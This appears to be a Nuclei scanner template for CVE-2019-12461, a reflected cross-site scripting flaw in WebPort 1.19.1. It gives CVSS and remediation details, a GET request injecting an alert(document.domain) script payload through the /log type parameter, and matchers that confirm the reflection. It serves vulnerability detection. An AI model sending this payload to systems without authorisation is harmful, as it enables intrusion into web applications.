52 lines
1.6 KiB
YAML
52 lines
1.6 KiB
YAML
id: CVE-2019-12461
|
|
|
|
info:
|
|
name: WebPort 1.19.1 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
|
|
remediation: |
|
|
Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability.
|
|
reference:
|
|
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
|
|
- https://webport.se/nedladdningar/
|
|
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/
|
|
- https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-12461
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-12461
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00269
|
|
epss-percentile: 0.64184
|
|
cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: webport
|
|
product: web_port
|
|
tags: cve,cve2019,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"</script><script>alert(document.domain);</script><script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100f655bc71c0787c026f58fbcf82a6f94c62ad5c5d34d4da3fa62bf5efca0af90602202ba87f8c29a50b6764e0bb83248db4eb44b7b68e3ee27d6ce7447940a00f9db2:922c64590222798bb761d5b6d8e72950
|